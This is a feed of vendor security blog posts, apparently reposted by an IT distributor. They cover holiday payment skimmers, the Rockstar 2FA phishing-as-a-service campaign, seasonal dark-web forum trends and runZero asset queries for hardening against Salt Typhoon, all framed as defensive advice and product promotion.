Skip to content

The Hidden Threat of Malware Skimmers on Cyber Monday

Introduction to Cyber Monday Hazards

With the rise of digital commerce, Cyber Monday has become a focal point for online shopping, attracting consumers with unbeatable deals and offers. Unfortunately, this surge in online activity also draws the attention of cybercriminals seeking to exploit vulnerabilities in e-commerce platforms. Among the myriad threats, malware skimmers stand out as particularly dangerous. These malicious programs stealthily capture sensitive payment information, such as credit card numbers and personal details, during online transactions. As cybercriminals become increasingly sophisticated, the threat landscape evolves, making it imperative for both consumers and businesses to understand the nature of these risks. The stakes are high, and the need for robust cybersecurity measures has never been greater.

Comprehending Malware Skimmers

Malware skimmers are sophisticated threats designed to surreptitiously capture payment details during online transactions. These malicious programs are typically injected into e-commerce websites, lying dormant until users enter their payment information. Upon capturing sensitive data, such as credit card numbers and personal details, the skimmers transmit this information to cybercriminals. This threat is especially concerning as it often goes undetected by both consumers and website operators. The methods employed by these skimmers include exploiting vulnerabilities in website code or compromising third-party plugins. Understanding how these malicious entities operate is crucial for developing effective countermeasures and ensuring a safer online shopping experience.

Recent Developments in Malware Skimming

Cybercriminals have increasingly refined their techniques in recent years, making malware skimmers more sophisticated and harder to detect. Notable incidents have impacted major companies, showcasing the persistent threat these skimmers pose to the e-commerce sector. A significant rise in malvertising incidents has been observed, particularly in the United States, which saw a 42% increase month-over-month last fall. Similarly, an uptick of 41% was observed from July to September this year. These statistics underscore the growing menace of malware skimmers. The ongoing evolution of these malicious programs necessitates a heightened level of vigilance and a proactive approach to cybersecurity. Advanced skimming techniques now exploit vulnerabilities in website code and third-party plugins with greater efficiency, emphasizing the need for continuous monitoring and updating of security protocols. As cybercriminals adapt, so must our strategies to counteract these evolving threats.

Safeguarding Your Personal Data

Proactively defending your personal data requires a multi-layered approach. Begin by cultivating a habit of using strong, unique passwords for every online account. Incorporate a mix of letters, numbers, and symbols to enhance complexity. Implement two-factor authentication wherever possible, adding an additional safeguard that requires a second form of verification before granting access. Regularly update all devices and software to protect against the latest threats. Utilize reputable antivirus and anti-malware programs to scan for potential vulnerabilities. Be cautious about sharing personal information and only provide details to trusted sites. Employing a secure VPN can also add a layer of protection when accessing the internet from public networks.

Secure Online Shopping Habits

Maintaining secure online shopping habits is vital in defending against malware skimmers. Begin by verifying that the websites you shop on are reputable and use robust encryption protocols, typically indicated by a padlock symbol in the address bar. Always ensure that your devices, browsers, and security software are current, as updates often include patches for vulnerabilities that could be exploited by malware skimmers. Avoid using public Wi-Fi for transactions, as these networks are often less secure and can be easily exploited by cybercriminals. Utilize a secure VPN when accessing the internet from public places to add an extra layer of security. Be cautious with emails and links, as phishing attempts can lead to malicious websites designed to steal your information. It’s also prudent to use credit cards instead of debit cards for online purchases, as credit cards generally offer better fraud protection. Taking these steps will significantly bolster your defenses against the ever-evolving threat of malware skimmers, ensuring a safer and more secure online shopping experience.

Identifying Indicators of a Compromised Website

Identifying indicators of a compromised website is essential for steering clear of potential threats. Be wary of unexpected pop-ups or intrusive advertisements, which may signify a breach. Unusual URLs, particularly those with misspellings or extra characters, can also be red flags. Observe the website’s layout and functionality; inconsistencies or slow loading times might indicate malicious interference. Hover over links to preview their destinations and ensure they align with legitimate domains. Browser security warnings should never be ignored, as they often provide critical alerts about potential risks. Additionally, the absence of HTTPS encryption, usually indicated by a padlock symbol in the address bar, can point to inadequate security measures.

Reacting to a Cybersecurity Threat

Upon suspecting a cybersecurity breach, swift and decisive action is crucial to mitigate damage. Initially, contact your financial institutions to inform them of potential fraudulent activity. They can assist in freezing accounts, issuing new cards, and monitoring for suspicious transactions. Additionally, change your passwords for any affected accounts, ensuring they are strong and unique to prevent further unauthorized access.

Next, report the incident to relevant authorities, such as the Federal Trade Commission (FTC) or your local cybersecurity agency. Providing detailed information about the breach can aid in broader efforts to combat cybercrime. It is also advisable to alert the affected e-commerce platform so they can investigate and address any vulnerabilities.

In parallel, conduct a thorough scan of your devices using reputable antivirus and anti-malware software to detect and eliminate any lingering threats. Regularly updating your security tools ensures they are equipped to identify the latest malware variants.

Consider placing fraud alerts or credit freezes on your credit reports through major credit bureaus. This adds an extra layer of protection, making it more challenging for cybercriminals to open new accounts in your name.

Educate yourself and stay informed about common cyber threats and preventative measures. Being proactive and knowledgeable can significantly reduce your risk of future incidents. Engage with cybersecurity communities and forums to share experiences and learn from others.

Finally, evaluate and strengthen your overall cybersecurity posture. Implementing multi-factor authentication, using a secure VPN, and maintaining vigilant online practices can fortify your defenses against evolving threats. By taking comprehensive and immediate steps, you can safeguard your personal information and contribute to a more secure digital environment.

Remaining Vigilant in an Increasingly Digital Society

Cyber Monday offers unparalleled opportunities for online shopping but also exposes consumers and businesses to the hidden dangers of malware skimmers. These stealthy threats underscore the importance of vigilance, robust cybersecurity measures, and secure online practices. By recognizing the evolving tactics of cybercriminals and adopting proactive defenses—such as strong passwords, two-factor authentication, secure VPN usage, and careful scrutiny of websites—individuals can protect their sensitive information during transactions.

For businesses, maintaining up-to-date security protocols, monitoring for vulnerabilities, and educating customers about safe practices are vital steps in minimizing risk. The growing sophistication of malware skimmers requires a collective effort to enhance cybersecurity awareness and resilience. By staying informed and prepared, we can outpace cybercriminals and ensure that the benefits of digital commerce continue to outweigh the risks.

About Portnox
Portnox provides simple-to-deploy, operate and maintain network access control, security and visibility solutions. Portnox software can be deployed on-premises, as a cloud-delivered service, or in hybrid mode. It is agentless and vendor-agnostic, allowing organizations to maximize their existing network and cybersecurity investments. Hundreds of enterprises around the world rely on Portnox for network visibility, cybersecurity policy enforcement and regulatory compliance. The company has been recognized for its innovations by Info Security Products Guide, Cyber Security Excellence Awards, IoT Innovator Awards, Computing Security Awards, Best of Interop ITX and Cyber Defense Magazine. Portnox has offices in the U.S., Europe and Asia. For information visit http://www.portnox.com, and follow us on Twitter and LinkedIn.。

About Version 2 Limited
Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

Rockstar 2FA: Compromising Microsoft 365 Accounts-What MSPs and Small Businesses Need to Know

Key Takeaways 

  1. Sophisticated Phishing-as-a-Service Model: Rockstar 2FA uses advanced adversary-in-the-middle (AiTM) techniques to bypass multi-factor authentication (MFA) protections in Microsoft 365.
  2. Small Businesses Are Prime Targets: Limited resources and cybersecurity awareness make small and medium-sized businesses especially vulnerable to such attacks.
  3. MSPs Must Evolve Defense Strategies: The role of Managed Service Providers (MSPs) in combating advanced threats is more critical than ever, requiring proactive tools, training, and incident response.

 

The Threat Landscape: What Is Rockstar 2FA?

A recent discovery has exposed a new iteration of Phishing-as-a-Service (PhaaS) platforms called Rockstar 2FA. This campaign focuses on stealing credentials from Microsoft 365 (M365) by bypassing MFA protections through adversary-in-the-middle (AiTM) techniques. The platform is a subscription-based service marketed to cybercriminals across forums like Telegram and Mail.ru, offering advanced features such as:

  • Session cookie harvesting to hijack active user sessions
  • Customizable phishing templates mimicking trusted services
  • Antibot features to avoid automated detection systems
  • Randomized source code and links to evade detection and FUD attachments 

Rockstar 2FA capitalizes on user trust in services like Microsoft 365, posing a significant risk for organizations that rely on this platform for communication and collaboration. Its accessibility to attackers, regardless of technical expertise, makes it a widespread and pressing concern.

For more technical details, see the analysis by Trustwave: Rockstar 2FA PhaaS Campaign.

 

How the Attack Works

At the heart of the Rockstar 2FA campaign is its adversary-in-the-middle (AiTM) technique. Here’s how the attack unfolds:

  1. Phishing Email: The Attacker is sending an email using the templates of the Rockstar platform, such as: Document and file-sharing notifications, MFA lures, E-signature platform-themed messages and more. The campaign executed through several email delivery mechanisms, like compromised accounts, to conceal oneself behind a credible source and contain FUD links and attachments to bypass antispam detections.
  2. Antibot: Upon being redirected to the landing page, the user will encounter a Cloudflare Turnstile challenge – a free service that protects websites from bots. Threat actors now exploit to avoid automated analysis of their phishing pages.
  3. The AiTM Server: The server functions as both the phishing landing page, the credentials housing server and the proxy server. The phishing page mimics the brand’s sign-in page despite obfuscated HTML, forwarding those credentials to the legitimate service to complete the authentication process and then sending user data directly to the AiTM server to extract credentials and retrieve the target account’s session cookie.
  4. Credential and Cookie Theft: When the victim enters their login credentials and MFA code, the proxy server captures both, along with session cookies.
  5. Session Hijacking: Using these session cookies, attackers can access the victim’s account without needing to allow MFA repeatedly.

This approach is particularly effective because it nullifies MFA protections, which are traditionally seen as a critical safeguard against unauthorized access.

 

The Impact on Small Businesses Using Microsoft 365

Small businesses are a favorite target for phishing campaigns due to limited cybersecurity resources and expertise. For organizations heavily reliant on M365 for day-to-day operations, the risks include:

  • Data Breaches: Unauthorized access to sensitive files, emails, and client information stored in M365.
  • Business Disruption: Compromised accounts can lead to halted operations, delayed projects, or worse, ransomware incidents.
  • Business Email Compromise (BEC) is a sophisticated type of phishing attack where cybercriminals impersonate trusted executives, employees, or business partners to deceive victims into transferring funds or sharing sensitive information. BEC often involves carefully crafted emails that exploit human trust, bypassing technical defenses and resulting in significant financial and reputational damage for organizations.
  • Financial Loss: Whether through direct theft, fraudulent transactions, or fines related to non-compliance with data protection regulations.

The Rockstar 2FA campaign also leverages trusted platforms like Atlassian Confluence, Google Docs, Microsoft OneDrive and OneNote- to host malicious links, making phishing emails harder to identify.

 

The Critical Role of MSPs in Defending Against Rockstar 2FA and Similar Threats

Managed Service Providers (MSPs) have become indispensable for small and medium-sized enterprises (SMEs) navigating today’s complex cybersecurity landscape. As Rockstar 2FA highlights, phishing campaigns are becoming more advanced, leveraging tools and tactics that were once the domain of highly skilled hackers. In this context, MSPs play a multifaceted role, acting not just as service providers but as strategic partners in securing their clients’ operations.

 

1. Proactive Threat Prevention

MSPs must focus on preventing threats before they reach their clients’ environments. This requires a blend of technical expertise, advanced tools, and constant vigilance.

  • Deploying Phishing Simulations:
    MSPs can implement solutions like Guardz’s AI-powered phishing simulations to proactively test their clients’ susceptibility to phishing attempts. These simulations mirror real-world scenarios, helping organizations identify gaps in employee training and response.
    • Example: Regular phishing drills can reveal if employees are consistently clicking on malicious links, allowing MSPs to intervene with targeted education.
  • Security Configuration Management:
    Ensuring that Microsoft 365 environments are configured with best-practice security settings (e.g., disabling legacy authentication, enabling conditional access policies) reduces the attack surface significantly.

 

2. Real-Time Detection and Response

Phishing campaigns like Rockstar 2FA are designed to bypass traditional security mechanisms, making real-time detection critical.

  • Anomaly Monitoring:
    MSPs should deploy tools that track login anomalies, such as sign-ins from unexpected locations or devices. Suspicious behavior can trigger alerts and automatic account lockdowns.
  • Continuous Security Operations:
    Many MSPs now operate Security Operations Centers (SOCs) or leverage third-party providers to monitor client environments around the clock. For example, unusual activity within Microsoft 365—like mass file downloads—can indicate a compromised account and prompt immediate action.
  • Incident Response Planning:
    When phishing attacks succeed, MSPs must act quickly to mitigate damage. An effective incident response plan includes:
    • Revoking compromised session cookies and resetting credentials.
    • Performing forensic analysis to understand how the breach occurred.
    • Communicating transparently with the client about the incident and steps for recovery.

 

3. Employee Education and Cyber Hygiene

Phishing remains one of the most successful attack vectors because it targets human behavior. MSPs can turn this vulnerability into a strength by fostering a culture of cybersecurity awareness.

  • Tailored Cybersecurity Training:
    MSPs should regularly provide training sessions for employees, focusing on real-world examples of phishing attempts. These sessions should cover:
    • Identifying phishing red flags, such as mismatched URLs, urgent language, and unusual requests.
    • Steps to verify sender legitimacy, such as calling the organization directly.
    • The importance of not sharing credentials or MFA codes under any circumstances.
  • Phishing Resilience Programs:
    A resilience program combines simulated phishing attacks, immediate feedback, and ongoing education. The goal is to transform employees from potential vulnerabilities into a critical line of defense.

 

4. Security Integration Across Platforms

Small businesses often rely on multiple cloud-based platforms beyond Microsoft 365, such as Google Workspace, Dropbox, and CRM systems. MSPs must ensure that security measures extend seamlessly across these platforms.

  • Unified Threat Management:
    By integrating security tools across platforms, MSPs can create a centralized system for threat detection and response. This approach prevents attackers from exploiting gaps in security coverage.
  • Identity and Access Management (IAM):
    Implementing IAM solutions ensures that access to sensitive data is restricted to authorized personnel. MSPs should use tools that enforce principles like least privilege and role-based access controls.

 

5. Guiding Clients Through a Changing Threat Landscape

Cyber threats evolve rapidly, and businesses often struggle to keep up. MSPs act as trusted advisors, helping their clients navigate these changes.

  • Regular Security Reviews:
    Periodic reviews allow MSPs to assess their clients’ current security posture and recommend updates to address new threats, such as those posed by Rockstar 2FA.
  • Advising on Cybersecurity Investments:
    MSPs can guide businesses on the most effective use of limited budgets, prioritizing solutions that deliver the highest return on investment. For instance:
    • Encouraging investment in tools like phishing simulations to prevent human errors.
    • Recommending endpoint detection and response (EDR) solutions to protect against ransomware.
  • Cyber Insurance Advisory:
    With threats like Rockstar 2FA on the rise, MSPs can assist clients in obtaining cyber insurance policies that cover phishing-related damages, complementing their technical defenses.

 

6. Building Trust Through Transparency

For many small businesses, trust is a key factor in selecting an MSP. Clients need to feel confident that their MSP is not only capable of defending against threats but also committed to their success.

  • Regular Reporting:
    Providing clients with detailed reports on security incidents, training outcomes, and system health builds confidence and highlights the value of the MSP’s services.
  • Collaborative Incident Management:
    When a breach occurs, clear and honest communication ensures clients understand the steps being taken to resolve the issue and prevent future occurrences.

 

Guardz’s Comprehensive Approach to Phishing Prevention

Guardz offers a robust suite of tools designed to combat phishing threats and enhance organizational resilience, making it an invaluable ally for MSPs and small businesses. By combining email security protection and AI-powered phishing simulations, Guardz provides both proactive and reactive defenses against campaigns like Rockstar 2FA.

 

1. Email Security Protection

Guardz’s email security solution is a critical first line of defense against phishing attacks. It actively scans and monitors incoming emails, detecting and blocking suspicious messages before they reach employees’ inboxes.

Key capabilities include:

  • Phishing Detection: Identifies malicious links, attachments, and spoofed sender addresses commonly used in phishing campaigns.
  • Real-Time Threat Analysis: Uses advanced algorithms to analyze email metadata and content for indicators of compromise (IoCs).
  • Automated Remediation: Flags and quarantines phishing emails, preventing users from interacting with potentially harmful content.

This layer of protection significantly reduces the likelihood of a phishing attack reaching employees, especially in environments with high email traffic like Microsoft 365.

 

2. Phishing Simulation Tool

Even with robust email protection, phishing attempts may occasionally bypass filters, relying on human error to succeed. Guardz addresses this vulnerability with its AI-powered phishing simulation tool, designed to enhance employee awareness and resilience.

How it Works:

  • Realistic Simulations: Guardz leverages AI to craft realistic phishing campaigns that mimic current threats, including tactics like AiTM attacks.
  • Customizable Scenarios: MSPs can tailor simulations to align with the specific challenges faced by their clients, making the training highly relevant.
  • Immediate Feedback: Employees receive instant feedback on their actions during simulations, turning mistakes into valuable learning opportunities.
  • Actionable Reporting: Detailed reports help organizations identify patterns in employee behavior and target areas for improvement.

By regularly running simulations, businesses can build a culture of vigilance, ensuring employees are prepared to recognize and report phishing attempts in real-world scenarios.

 

Lessons Learned: Protecting Against Sophisticated Phishing Attacks

For MSPs:

  1. Stay Ahead of Threats: Regularly update clients about evolving phishing tactics like AiTM attacks to ensure they understand the risks.
  2. Adopt Layered Security: Combine phishing simulations, endpoint protection, and continuous monitoring for a robust defense.
  3. Empower Through Education: Provide ongoing training and resources to help employees identify and report phishing attempts effectively.

For Small Businesses:

  1. Trust but Verify: Always verify suspicious emails, especially those requesting credentials or sensitive information.
  2. Invest in Training: Regular phishing simulations can help employees stay alert and minimize errors.
  3. Rely on Experts: Partnering with a knowledgeable MSP ensures access to advanced tools and expertise that may not be available in-house.

 

The Rockstar 2FA campaign highlights the growing sophistication of phishing attacks and the urgent need for advanced defenses. For MSPs and small businesses, proactive strategies, continuous education, and robust tools like Guardz’s phishing simulations are critical in staying secure.

Start Free Trial

About Guardz
Guardz is on a mission to create a safer digital world by empowering Managed Service Providers (MSPs). Their goal is to proactively secure and insure Small and Medium Enterprises (SMEs) against ever-evolving threats while simultaneously creating new revenue streams, all on one unified platform.

About Version 2 Limited
Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

The darkest season: the peak time of cyber threats

Summary: Dark web forums peak in activity during winter months. Holiday scams surge, boredom rises, and AI makes cyber-attacks easier.

The dark web is a key enabler for cybercrime. It allows bad actors to share tools, knowledge, and services secretly. 

Anyone wanting to buy illegal items—like cyber-attack tools or drugs—can find them on dark web marketplaces. These markets appear and disappear quickly as they get blocked. They are usually advertised on dark web forums, and some even have mirror sites on the clear web.

Researching the dark web is hard because marketplaces have short lifespans. They come and go quickly. That’s why NordLayer and NordStellar decided to analyze dark web forums instead.

Forums are more stable over time. This stability makes it possible to see trends in discussions. These forums mix legal topics like news, politics, and content sharing with illegal activities.

However, legal activities like whistleblowing make up less than 1% of the content. Illegal activities are the largest part. By studying these forums, we wanted to uncover new trends in illicit activities.

Our research shows that illicit posts peak in November, December, and January. The darkest months of the year also see the most activity in the web’s shadowy corners.

Why is winter the peak season for illicit posts?

We studied posts from June 2023 to October 2024. We categorized posts by topics and focused on illicit ones. Here’s how those posts were distributed:

These numbers reflect posts on the dark web, not actual attacks. However, research by BitNinja Security, Cloud Security Alliance, and Mimecast shows that Q4 is also when most cyber-attacks take place. This suggests a link between increased dark web activity and real-world cybercrime during this period.

Why are threat actors more active in dark months, both discussing illicit topics and committing crimes?

Carlos Salas (Sr. R&D Engineer at NordLayer): “In most industries, November to January is the busiest time, mainly because of the high amount of transactions from Thanksgiving, Black Friday, and Christmas. Criminals exploit this, knowing people are more likely to click on a phishing link while going through thousands of email orders and offers, compromising their network security.”

It’s a known issue. Black Friday is already called Black Fraud Day. In the UK only, more than 16,000 reports of online shopping fraud were recorded between November 2023 and January 2024, with each victim losing £695 on average.

Andrius Buinovskis (Head of Product at NordLayer): “Everyone is looking for gifts and the best prices, and fake ads try to hook you into deals. Bad actors exploit this season, using urgency tactics boosted by AI to spread threats. People are more relaxed and less cautious, paying less attention to how they use personal and company devices. Employees might receive phishing emails like a supposed ‘yearly bonus’ from the CEO, which could lead to catastrophic consequences for the company.”

But on dark web forums, people discuss not only cybercrime. A big part of forums is about sharing pirated software and media, like movies.

This number grows in dark months. Comparing the summer months of 2023 with November—January, the number of dark forum posts about all kinds of pirated content surged by 105%.

Vakaris Noreika (Head of Product at NordStellar): “I think it’s the weather, to be honest. People tend to stay at home more and sit at their computers bored, which makes them more active in their cybercriminal activities. We’ve seen a similar effect during the COVID lockdown when the number of dark web users increased a lot. We also see fewer large data breaches in the summer, and this cycle seems to repeat every year.”

Like advanced persistent threats, “advanced persistent teenagers” are now a problem. Bored but skilled threat actors cause major disruptions. They trick employees with emails and calls, posing as help desk staff. These attacks lead to data breaches affecting millions. Teenagers now show techniques once limited to nation-states.

Another factor is adding to the boredom of dark web forum users. They are mostly from countries where winter is pretty harsh. Most users accessing Tor—the browser used for dark web activities—are from Germany (36%), the US (14%), and Finland (4%). For countries where users access Tor via bridges, the top is Russia (41%). Maybe dark web forums are just the coziest winter hangouts.

Changing platforms and AI effects on cybercrime

Our research shows that September and October of 2024 had much fewer posts about illicit things on dark web forums than a year before. Why is that?

Vakaris Noreika: “There could be many reasons why this happens. The most notable ones are maybe the platform changes; some hacker forums close, others open up, some become popular to fade out later.

There are some hacker communities, especially from Russia, which have been active for more than 20 years now. This is because the forum owners don’t get arrested, unlike forum owners from the US, UK, etc., who do get arrested way more often.

Telegram has also been a huge platform change. We’ve seen exponential growth in hacking-related activity on Telegram since the beginning of the war in Ukraine. But Telegram activity is focused on niche topics, while forums cover a wider range of ideas.”

Another trend affecting dark web discussions could be AI use in cybercrime.

Retail and cloud computing giant Amazon, which can now view activity on around 25% of all IP addresses on the internet, says it is seeing hundreds of millions more possible cyber threats across the web each day compared to earlier this year. They used to see about 100 million hits per day, but that number has grown to 750 million over six or seven months.

Amazon’s Chief Information Security Officer is sure AI is making tasks easier for ordinary people, allowing them to do things they couldn’t do before just by asking the computer. This might explain fewer discussions on dark web forums—why ask others when AI can do the work for you?

How to protect organizations during peak cybercrime seasons

So, winter months bring not only holidays but also heightened cyber risks. Instead of enjoying time with your family, you might find yourself dealing with cyber-attacks.

But don’t worry—there are steps you can take to protect your organization. The good news is these measures aren’t expensive or hard to implement.

Many of these precautions are the same as those needed year-round. Basic cybersecurity practices like employee training, strong passwords, and regular software updates are essential.

Employee education is the first line of defense.

Vakaris Noreika: “It’s hard to control what happens with your employees. It’s unavoidable that their data will be leaked online, and this data might be used to attack your company. Here’s what I always encourage companies to do:

  1. Educate employees about phishing, credential stuffing, and other popular attack methods.
  2. Take care of the information that’s already leaked: monitor it and react. NordStellar can help with that.
  3. Manage access to important company resources carefully.

By doing this, you will be better off than 99% of companies around.”

Prepare now to minimize risks during the peak cyber-attack season.

Carlos Salas:Double down on cybersecurity awareness in months before the high season. Consider having a pentest done beforehand to know what could be exploited by criminals.

That said, we’re humans, and there will always be a chance of clicking the wrong link or sharing the wrong files. So, practices such as network segmentation, setting up security policies for devices, or using toolsets such as Data Loss Prevention suites and malware protection are a must-have. They help contain the threats and minimize the ‘blast radius’ of any security incident.”

With AI making cyber-attacks easier, it’s crucial to think about these things right now, when the cyber-attack season is at its peak. The next year could bring even more advanced threats.

So, give your company a Christmas present and invest in a solid cybersecurity solution.

Methodology

NordStellar acquired data from over 80 forums where illicit activities are most often discussed. These forums span different web layers: the clear web, the deep web, and the dark web. We gathered textual content from forum threads between June 2023 and October 2024. The numbers we obtained represent the number of forum posts.

We used a fine-tuned AI model to categorize dark web posts into 67 tags. These tags were then grouped into 10 broader categories. For example, the tag “SERVICE” refers to posts where users offer services for a fee, including hacking or hiring hitmen. This tag falls under “Illicit services and marketplaces.”

The study is thorough but has limitations from analyzing posts on approximately 80 forums only. Additionally, the shorter lifecycle of criminal sites and the rapid rise of mirror sites can affect data consistency and completeness.

About Nord Security
The web has become a chaotic space where safety and trust have been compromised by cybercrime and data protection issues. Therefore, our team has a global mission to shape a more trusted and peaceful online future for people everywhere.

About NordLayer
NordLayer is an adaptive network access security solution for modern businesses – from the world’s most trusted cybersecurity brand, Nord Security.

The web has become a chaotic space where safety and trust have been compromised by cybercrime and data protection issues. Therefore, our team has a global mission to shape a more trusted and peaceful online future for people everywhere.

About Version 2 Limited
Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

Taming the Typhoons: How runZero Keeps You Ahead of State-Sponsored Cyber Threats

China’s state-sponsored cyber operations—aptly nicknamed with “Typhoon” monikers—have been brewing trouble for over a decade. From Violet to Salt Typhoon, these advanced persistent threat (APT) groups have been wreaking havoc on government entities, critical infrastructure, and other high-value targets. Their evolution highlights one thing loud and clear: attackers are always one step ahead, looking for the weakest link. 

But fear not—there’s a way to outpace these storms. Let’s break down what these Typhoons have been up to and how runZero brings calm to the chaos with unparalleled visibility and proactive defense.

 

The Typhoon Timeline: An Evolution of Threats

The Typhoon story began with Violet Typhoon, which stuck to the basics: phishing, exploiting known vulnerabilities, and going after traditional IT systems. They were your typical “steal the sensitive data and run” kind of crew.

Then came Volt Typhoon, which shifted focus to U.S. critical infrastructure. They embraced “living off the land” techniques, cleverly blending into hybrid IT and OT environments while avoiding detection. Think of them as the first innovators of the Typhoons.

Not to be outdone, Flax Typhoon targeted IoT devices like cameras and DVRs, transforming these “unimportant” devices into powerful botnets. It was a wake-up call for organizations ignoring their IoT inventory.

And now, Salt Typhoon has arrived, skillfully exploiting IT, OT, and IoT systems with alarming precision. Their primary focus? Telecommunications providers and ISPs, where they leverage trusted devices and connections to steal customer call records, compromise private communications—particularly those of individuals involved in government or political activities—and access sensitive information tied to U.S. law enforcement requests under court orders.

 

Why Visibility is the Game-Changer

The Typhoon saga reveals one critical truth: attackers will find the blind spots in your network. Whether it’s a forgotten IoT device, an outdated VPN concentrator, or a misconfigured firewall, these gaps become open doors for adversaries.

That’s why visibility—complete visibility—is key to staying ahead. Enter runZero.

 

How runZero Helps You Outmaneuver Salt Typhoon

Salt Typhoon thrives on exploiting edge devices and blending into your network. But runZero makes their job infinitely harder. Here’s how we give you the upper hand:

  • Proactive Edge Discovery: With real-time scanning and unmatched fingerprinting capabilities, runZero identifies every device—routers, firewalls, switches—before attackers can. Firmware versions? Check. Misconfigurations? Double-check.
  • Mapping Internal Pathways: Once inside, attackers aim to move laterally. runZero lights up internal pathways, exposing high-risk devices and connections that could serve as stepping stones for adversaries.
  • Correlating Internal and External Risks: Unlike siloed tools, runZero connects the dots between internal and external assets, revealing shared vulnerabilities and dependencies. That’s insight no other platform offers.
  • Risk-Based Prioritization: runZero doesn’t just throw vulnerabilities at you. It ranks them by exploitability, exposure pathways, and criticality, so you can tackle the most pressing issues first.
  • Continuous Monitoring: Networks change constantly, and so do risks. With runZero’s continuous discovery, you’ll always have an up-to-date picture of your attack surface.

 

Actionable Insights for Real-World Defense

Need proof of what runZero can do? Let’s take CISA’s latest guidance tailored to counter Salt Typhoon’s tactics and the queries you can use in the runZero platform to identify assets at risk.

Strengthening Visibility: Monitoring: Network Engineers

If feasible, limit exposure of management traffic to the Internet. Only allow management via a limited and enforced network path, ideally only directly from dedicated administrative workstations. Do not manage devices from the internet. Only allow device management from trusted devices on trusted networks.

# Service Query
(type:router OR type:switch OR type:firewall) AND (port:80 OR port:443) AND has_public:true

Monitor user and service account logins for anomalies that could indicate potential malicious activity. Validate all accounts and disable inactive accounts to reduce the attack surface. Monitor logins occurring internally and externally from the management environment.

# Users Query
alive:t AND (
  isDisabled:true
OR
  (source:googleworkspace suspended:t)
OR
  (source:googleworkspace isEnforcedIn2Sv:f)
OR
  (has:accountExpiresTS)
OR
  (isDisabled:true)
OR
  (passwordExpired:true OR msDS-UserPasswordExpiryTimeComputedTS:<now))

Ensure the inventory of devices and firmware in the environment are up to date to enable effective visibility and monitoring. runZero can track and incorporate end-of-life data from a variety of sources.

# Asset Query
os_eol_expired:t

Monitoring: Network Engineers

Closely monitor all devices that accept external connections from outside the corporate network

# Asset Query
has_public:t

IPsec tunnel usage

# Service Query
protocol:ike

Hardening Systems & Devices: Protocols and Management Processes: Network Engineers

Additionally, as a general strategy, put devices with similar purposes in the same VLAN. For example, place all user workstations from a certain team in one VLAN, while putting another team with different functions in a separate VLAN. runZero’s innovative outlier score can help locate devices that don’t look like others in the same site.

# Asset Query
outlier:>=2

if using Simple Network Management Protocol (SNMP), ensure only SNMP v3 with encryption and authentication is used

# Service Query
protocol:snmp1 or protocol:snmp2 or protocol:snmp2c

Disable all unnecessary discovery protocols, such as Cisco Discovery Protocol (CDP).

# Service Query
protocol:cdp

Ensure Transport Layer Security (TLS) v1.3 is used on any TLS-capable protocols to secure data in transit over a network.

# Service Query
tls.supportedVersionNames:"SSL" OR tls.supportedVersionNames:"TLSv1.0" OR tls.supportedVersionNames:"TLSv1.1" OR tls.supportedVersionNames:"TLSv1.2"

Disable Secure Shell (SSH) version 1.

# Service Query
banner:"SSH-1"

Hardening Systems & Devices: Protocols and Management Processes: Network Defenders

Disable any unnecessary, unused, exploitable, or plaintext services and protocols, such as Telnet, File Transfer Protocol (FTP), Trivial FTP (TFTP), SSH v1, Hypertext Transfer Protocol (HTTP) servers, and SNMP v1/v2c

# Service Query
protocol:telnet OR protocol:ftp OR protocol:tftp OR banner:"SSH-1" OR (protocol:http AND NOT protocol:tls) OR protocol:snmp1 OR protocol:snmp2 OR protocol:snmp2c

Conduct port-scanning and scanning of known internet-facing infrastructure

# Service Query
has_public:t

 

The Final Word

The Typhoon threat is real, but with runZero, you don’t have to weather the storm alone. Whether you’re facing state-sponsored attackers like Salt Typhoon or just trying to get a handle on your sprawling network, runZero does more than uncover what’s hiding in your network—we redefine what’s possible in exposure management. Our agentless, credential-free approach means you get instant insights without the hassle. And our advanced fingerprinting technology? It’s second to none, giving you detailed device profiles that competitors can only dream of.

But it’s not just about tech; it’s about speed and adaptability. As networks grow more complex and threats more advanced, runZero ensures you’re always one step ahead of these Typhoons no matter how their tactics evolve. From shadow IT to unmanaged IoT, we uncover everything—because the very things you didn’t know existed are exactly what these attackers are looking for.

About runZero
runZero, a network discovery and asset inventory solution, was founded in 2018 by HD Moore, the creator of Metasploit. HD envisioned a modern active discovery solution that could find and identify everything on a network–without credentials. As a security researcher and penetration tester, he often employed benign ways to get information leaks and piece them together to build device profiles. Eventually, this work led him to leverage applied research and the discovery techniques developed for security and penetration testing to create runZero.

About Version 2 Limited
Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

Gone Phishing: Understanding Different Phishing Types and How to Protect Yourself

Phishing attacks have become an epidemic. Approximately 3.4 billion phishing emails are sent worldwide each day, making it the leading attack vector in 41% of all data breaches. And it’s not just e-mail—phishing has expanded to voice, text, social media, and even fake websites, targeting users across multiple platforms to steal sensitive information and compromise accounts.

